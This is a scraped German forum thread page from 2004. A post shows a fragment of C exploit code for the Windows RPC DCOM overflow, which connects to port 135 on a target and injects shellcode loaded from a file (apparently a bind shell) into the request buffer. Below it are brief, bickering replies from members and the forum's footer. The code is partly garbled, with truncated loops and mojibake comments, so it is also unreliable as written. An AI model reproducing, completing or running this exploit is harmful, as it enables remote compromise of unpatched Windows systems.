WSADATA WSAData;
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[50000];
unsigned char buf2[50000];

printf("%s\n",ip);
//printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
//printf("Code by FlashSky,Flashsky xfocus org\n");
//printf("Welcome to our Site: http://www.xfocus.org\n");
//printf("Welcome to our Site: http://www.venustech.com.cn\n");
/* if(argc!=3)
{
printf("%s targetIP targetOS\ntargets:\n",argv[0]);
for(int i=0;i printf("%d - %s\n",i,target_os.target);
printf("\n%x\n",GETSTRCS(argv[1]));
return;
}
*/
/* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
*/
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(ip);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return 0;
}
len1=sizeof(request1);

len=sizeof(rawData);

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("%s - connect failed\n",ip);
return 0;
}

int vers=!version(ip,sock);

// printf("%d\n",vers);
// return;
// int vers=1;

FILE *fp;

//ç¨â ¥¬ ¯ ª¥â
// fp=fopen("shellcode","rb");
// fread(rawData,1,1036,fp);
// fclose(fp);
//⥯¥àì ­ã¦­® ááç¨â âì ­¥¯®á।á⢥­­® ¨á¯®«­ï¥¬ë© 襫«ª®¤!

fp=fopen("bshell2","rb");
int sz=fread(shellcode,1,1024,fp);
fclose(fp);
// printf("%d\n",sz);
for(int i=0;i rawData[i+0x71]=shellcode;
// fp=fopen("badfile.exe","rb");
// unsigned int sz1=fread(shellcode,1,50000,fp);
// fclose(fp);
// for(i=0;i // rawData[i+0x240]=shellcode;

// fp=fopen("pac","wb");
// fwrite(rawData,1,1036,fp);
// fclose(fp);

// return;


//


Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 18:05 
Offline
Benutzeravatar

Registriert: 03.03.2004, 14:55
Beiträge: 5969
Wohnort: Midgard
Bild

Das du immer sofort so eingeschnappt sein musst..wie ne Diva :bonk: und mag sein,dass du dich so toll mit den PC Bullshit auskennst,aber mich jucktz nich' :embarrasment: gibt viel wichtigere Dinge als den Schwachsinn mit den du deine Zeit verschwendest :stupid:

_________________
Bild


Zuletzt geändert von Noodlez am 07.05.2004, 18:07, insgesamt 1-mal geändert.

Nach oben
 Profil  
 
 Betreff des Beitrags:
BeitragVerfasst: 07.05.2004, 18:06 
Offline
Benutzeravatar

Registriert: 16.02.2004, 16:30
Beiträge: 2222
Wohnort: Weinheim
Noodlez hat geschrieben:
Bild

Das du immer sofort so eingeschnappt sein musst..wie ne Diva :bonk:


lool is ja gut........... :)


Nach oben
 Profil  
 
Beiträge der letzten Zeit anzeigen:  Sortiere nach  
Ein neues Thema erstellen Auf das Thema antworten  [ 110 Beiträge ]  Gehe zu Seite Vorherige  1 ... 4, 5, 6, 7, 8  Nächste

Alle Zeiten sind UTC + 1 Stunde


Wer ist online?

Mitglieder in diesem Forum: Bing [Bot] und 10 Gäste


Du darfst keine neuen Themen in diesem Forum erstellen.
Du darfst keine Antworten zu Themen in diesem Forum erstellen.
Du darfst deine Beiträge in diesem Forum nicht ändern.
Du darfst deine Beiträge in diesem Forum nicht löschen.
Du darfst keine Dateianhänge in diesem Forum erstellen.

Suche nach:
Gehe zu:  
Powered by phpBB® Forum Software © phpBB Group
Deutsche Übersetzung durch phpBB.de